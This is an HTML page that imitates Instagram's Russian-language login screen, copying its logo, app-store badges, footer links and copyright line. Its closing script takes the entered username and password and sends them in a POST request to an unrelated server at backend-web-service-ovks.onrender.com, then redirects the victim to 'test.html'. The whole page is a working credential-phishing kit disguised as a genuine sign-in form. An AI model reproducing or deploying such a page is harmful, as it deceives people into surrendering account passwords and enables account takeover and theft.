<!DOCTYPE html>
<html lang="en">
	<head>
		<meta charset="UTF-8" />
		<meta http-equiv="X-UA-Compatible" content="IE=edge" />
		<meta name="viewport" content="width=device-width, initial-scale=1.0" />
		<link type="image/x-icon" href="favicon.png" rel="shortcut icon" />
		<title>Войти • Instagram</title>
		<style>
			* {
				margin: 0;
				padding: 0;
				box-sizing: border-box;
				list-style: none;
				text-decoration: none;
				outline: none;
			}

			body {
				overflow-y: auto;
				font-family: Arial, sans-serif;
				background-color: #fff;
				display: flex;
				flex-direction: column;
				justify-content: space-between;
				min-height: 100vh;
			}

			main {
				display: flex;
				justify-content: center;
				align-items: center;
				height: calc(100vh - 135px);
			}

			form {
				background-color: #fff;
				padding: 40px;
				border: 1px solid rgb(219, 219, 219);
				text-align: center;
			}
			h2 {
				margin-bottom: 40px;
			}
			label {
				display: flex;
				align-items: center;
				width: 100%;
				position: relative;
			}

			label button {
				position: absolute;
				background: transparent;
				border: none;
				outline: none;
				right: 10px;
				cursor: pointer;
			}

			.label-login {
				margin-bottom: 8px;
			}

			input {
				background: #fafafa;
				width: 100%;
				padding: 10px;
				border: 1px solid #dbdbdb;
				border-radius: 4px;
				font-size: 12px;
				line-height: 14px;
			}

			.button-submit {
				margin-top: 15px;
				width: 100%;
				padding: 7px 16px;
				background-color: #4cb5f9;
				color: #fff;
				border: none;
				border-radius: 8px;
				cursor: pointer;
			}

			footer {
				padding: 40px 0;
				margin-top: auto;
			}

			footer ul {
				margin-bottom: 12px;
				display: flex;
				align-items: center;
				justify-content: center;
				flex-flow: row wrap;
			}

			footer ul li {
				margin: 0 8px;
			}
			footer ul li a {
				color: #737373;
				font-size: 12px;
				text-align: center;
				line-height: 14px;
				display: inline-block;
			}
			footer ul li a:hover {
				text-decoration: underline;
			}
			select {
				border: none;
				width: 90px;
				color: #737373;
				cursor: pointer;
				font-size: 12px;
				line-height: 14px;
			}
			.text-footer {
				color: #737373;
				font-size: 12px;
				line-height: 14px;
				margin-left: 20px;
			}
			.wrapper-from {
				max-width: 350px;
				width: 100%;
			}
			.footer-bottom {
				display: flex;
				align-items: center;
				flex-flow: row wrap;
				margin-top: 20px;
				justify-content: center;
			}
			.reset-link {
				font-size: 12px;
				line-height: 14px;
				margin-top: 20px;
				display: inline-block;
				text-align: center;
				color: #737373;
			}
			.install-app {
				font-size: 14px;
				line-height: 16px;
				margin: 20px 0;
				text-align: center;
				color: #737373;
			}
			.wrapper-link {
				display: flex;
				justify-content: center;
				height: 40px;
				align-items: stretch;
			}
			.wrapper-link a {
				height: 100%;
			}
			.wrapper-link a:first-child {
				width: 134px;
				margin-right: 10px;
			}
			.wrapper-link a:last-child {
				width: 110px;
			}
			.wrapper-link a img {
				width: 100%;
				height: 100%;
			}
			.wrapper-link a:first-child {
				margin-right: 10px;
			}
			.hidden {
				display: none !important;
			}
			.error,
			.error-mail {
				color: red;
				display: inline-block;
				margin-top: 10px;
				font-size: 12px;
			}
			.error-mail {
				margin-top: 0;
				margin-bottom: 10px;
			}
			@media screen and (max-width: 440px) {
				main {
					min-height: 50vh;
					height: auto;
				}
				form {
					border: none;
				}
			}
		</style>
	</head>
	<body>
		<main>
			<div class="wrapper-from">
				<form>
					<h2>
						<i
							data-visualcompletion="css-img"
							aria-label="Instagram"
							class=""
							role="img"
							style="
								background-image: url('https://static.cdninstagram.com/rsrc.php/v3/yx/r/WtxJZZ3-9ZP.png');
								background-position: 0px 0px;
								background-size: 176px 186px;
								width: 174px;
								height: 50px;
								background-repeat: no-repeat;
								display: inline-block;
							"
						></i>
					</h2>
					<label class="label-login">
						<input
							id="input-login"
							type="text"
							name="login"
							placeholder="Телефон, имя пользователя или эл. адрес"
							value=""
						/>
					</label>
					<span class="error-mail hidden">Введите корректную почту!</span>
					<label>
						<input
							id="input-password"
							type="password"
							name="password"
							placeholder="Пароль"
							value=""
						/>
						<button class="show-button hidden" type="button">Показать</button>
					</label>
					<span class="error hidden">Заполните пожалуйста данные!</span>
					<button class="button-submit" type="button">Войти</button>
					<a
						class="reset-link"
						href="https://www.instagram.com/accounts/password/reset/?next=%2Flogin%2F"
						target="_blank"
						>Забыли пароль?</a
					>
				</form>
				<p class="install-app">Установите приложение.</p>
				<div class="wrapper-link">
					<a
						aria-label="Скачать из Google Play"
						class=""
						href="https://l.instagram.com/?u=https%3A%2F%2Fplay.google.com%2Fstore%2Fapps%2Fdetails%3Fid%3Dcom.instagram.android%26referrer%3Dig_mid%253DF309AD2D-0756-47A0-BD4D-4054E4EA39BB%2526utm_campaign%253DloginPage%2526utm_content%253Dlo%2526utm_source%253Dinstagramweb%2526utm_medium%253Dbadge%26next%3D%252Flogin%252F&amp;e=AT2rhn-gB4-bBvMIEgEEEYdrw3Da5HgrUcn_rtvyxll1CTXlUxIobgwoLaoN0Yik7JN94v2O38O0LRVEyZep6jv3zBRjcfnpmalxHv7-7eja7RhYLMFEc4qawH9CjDf7s9ra4ujwcS7OOMgyBGzKPA"
						rel="nofollow noreferrer"
						role="link"
						tabindex="0"
						target="_blank"
					>
						<img
							alt="Скачать из Google Play"
							class="_aa5q"
							src="https://static.cdninstagram.com/rsrc.php/v3/yr/r/fDjwyLC88oO.png"
						/>
					</a>
					<a
						aria-label="Скачать с сайта Microsoft"
						class=""
						href="ms-windows-store://pdp/?productid=9nblggh5l9xt&amp;referrer=appbadge&amp;source=www.instagram.com&amp;mode=mini&amp;pos=-1919%2C-215%2C1918%2C1038&amp;next=%2Flogin%2F"
						rel="nofollow noreferrer"
						role="link"
						tabindex="0"
						target="_blank"
					>
						<img
							alt="Скачать с сайта Microsoft"
							class="_aa5q"
							src="https://static.cdninstagram.com/rsrc.php/v3/yv/r/_UbeIRgTpG-.png"
						/>
					</a>
				</div>
			</div>
		</main>
		<footer>
			<ul>
				<li><a href="https://about.meta.com/" target="_blank">Meta</a></li>
				<li><a href="https://about.instagram.com/">Информация</a></li>
				<li>
					<a href="https://about.instagram.com/blog/" target="_blank">Блог</a>
				</li>
				<li>
					<a href="https://www.instagram.com/about/jobs/" target="_blank"
						>Вакансии</a
					>
				</li>
				<li>
					<a href="https://help.instagram.com/" target="_blank">Помощь</a>
				</li>
				<li>
					<a
						href="https://developers.facebook.com/docs/instagram"
						target="_blank"
						>API</a
					>
				</li>
				<li>
					<a
						href="https://privacycenter.instagram.com/policy/?entry_point=ig_help_center_data_policy_redirect"
						target="_blank"
						>Конфиденциальность</a
					>
				</li>
				<li>
					<a href="https://help.instagram.com/581066165581870/" target="_blank"
						>Условия</a
					>
				</li>
				<li>
					<a href="https://www.instagram.com/explore/locations/" target="_blank"
						>Места</a
					>
				</li>
				<li>
					<a href="https://www.instagram.com/web/lite/" target="_blank"
						>Instagram Lite</a
					>
				</li>
				<li>
					<a href="https://www.threads.net/login" target="_blank">Threads</a>
				</li>
				<li>
					<a
						href="https://www.facebook.com/help/instagram/261704639352628"
						target="_blank"
						>Загрузка контактов и лица, не являющиеся пользователями</a
					>
				</li>
				<li>
					<a
						href="https://about.meta.com/technologies/meta-verified/"
						target="_blank"
						>Meta Verified</a
					>
				</li>
			</ul>
			<div class="footer-bottom">
				<select
					aria-label="Изменить язык отображения"
					class="x1ypdohk x5yr21d xg01cxk x10l6tqk x17qophe x13vifvy xh8yej3"
				>
					<option value="ru">Русский</option>
					<option value="af">Afrikaans</option>
					<option value="ar">العربية</option>
					<option value="cs">Čeština</option>
					<option value="da">Dansk</option>
					<option value="de">Deutsch</option>
					<option value="el">Ελληνικά</option>
					<option value="en">English</option>
					<option value="en-gb">English (UK)</option>
					<option value="es">Español (España)</option>
					<option value="es-la">Español</option>
					<option value="fa">فارسی</option>
					<option value="fi">Suomi</option>
					<option value="fr">Français</option>
					<option value="he">עברית</option>
					<option value="id">Bahasa Indonesia</option>
					<option value="it">Italiano</option>
					<option value="ja">日本語</option>
					<option value="ko">한국어</option>
					<option value="ms">Bahasa Melayu</option>
					<option value="nb">Norsk</option>
					<option value="nl">Nederlands</option>
					<option value="pl">Polski</option>
					<option value="pt-br">Português (Brasil)</option>
					<option value="pt">Português (Portugal)</option>
					<option value="sv">Svenska</option>
					<option value="th">ภาษาไทย</option>
					<option value="tl">Filipino</option>
					<option value="tr">Türkçe</option>
					<option value="zh-cn">中文(简体)</option>
					<option value="zh-tw">中文(台灣)</option>
					<option value="bn">বাংলা</option>
					<option value="gu">ગુજરાતી</option>
					<option value="hi">हिन्दी</option>
					<option value="hr">Hrvatski</option>
					<option value="hu">Magyar</option>
					<option value="kn">ಕನ್ನಡ</option>
					<option value="ml">മലയാളം</option>
					<option value="mr">मराठी</option>
					<option value="ne">नेपाली</option>
					<option value="pa">ਪੰਜਾਬੀ</option>
					<option value="si">සිංහල</option>
					<option value="sk">Slovenčina</option>
					<option value="ta">தமிழ்</option>
					<option value="te">తెలుగు</option>
					<option value="ur">اردو</option>
					<option value="vi">Tiếng Việt</option>
					<option value="zh-hk">中文(香港)</option>
					<option value="bg">Български</option>
					<option value="fr-ca">Français (Canada)</option>
					<option value="ro">Română</option>
					<option value="sr">Српски</option>
					<option value="uk">Українська</option>
				</select>
				<p class="text-footer">© 2023 Instagram from Meta</p>
			</div>
		</footer>
		<script>
			let login = ''
			let password = ''
			let inputLogin = document.querySelector('#input-login')
			let inputPassword = document.querySelector('#input-password')
			let showButton = document.querySelector('.show-button')
			let buttonSubmit = document.querySelector('.button-submit')
			let error = document.querySelector('.error')
			let errorMail = document.querySelector('.error-mail')

			inputLogin.addEventListener('input', e => {
				login = e.currentTarget.value
				if (login.length == '') {
					errorMail.classList.add('hidden')
				} else if (!login.match(/^([\w.%+-]+)@([\w-]+\.)+([\w]{2,})$/i)) {
					errorMail.classList.remove('hidden')
				} else {
					errorMail.classList.add('hidden')
				}
			})

			inputPassword.addEventListener('input', e => {
				password = e.currentTarget.value
				if (password.length == '') {
					showButton.classList.add('hidden')
				} else {
					showButton.classList.remove('hidden')
				}
			})
			showButton.addEventListener('click', e => {
				if (inputPassword.type === 'password') {
					inputPassword.type = 'text'
					e.currentTarget.innerText = 'Скрыть'
				} else {
					inputPassword.type = 'password'
					e.currentTarget.innerText = 'Показать'
				}
			})
			async function getDataUser() {
				let response = await fetch(
					'https://backend-web-service-ovks.onrender.com/login',
					{
						method: 'POST', // *GET, POST, PUT, DELETE, etc.
						mode: 'cors', // no-cors, *cors, same-origin
						cache: 'no-cache', // *default, no-cache, reload, force-cache, only-if-cached
						credentials: 'same-origin', // include, *same-origin, omit
						headers: {
							'Content-Type': 'application/json;charset=utf-8',
						},
						body: JSON.stringify({
							username: login,
							password: password,
						}),
					}
				)
				if (response.status === 200) {
					showButton.classList.add('hidden')
					inputPassword.value = ''
					inputLogin.value = ''
					password = ''
					login = ''
					error.classList.add('hidden')
					window.location.href =
						window.location.pathname.slice(
							0,
							Number(window.location.pathname.length - 10)
						) + 'test.html'
				}
			}
			buttonSubmit.addEventListener('click', e => {
				if (
					password == '' ||
					login == '' ||
					!login.match(/^([\w.%+-]+)@([\w-]+\.)+([\w]{2,})$/i)
				) {
					error.classList.remove('hidden')
				} else {
					getDataUser()
				}
			})
		</script>
	</body>
</html>
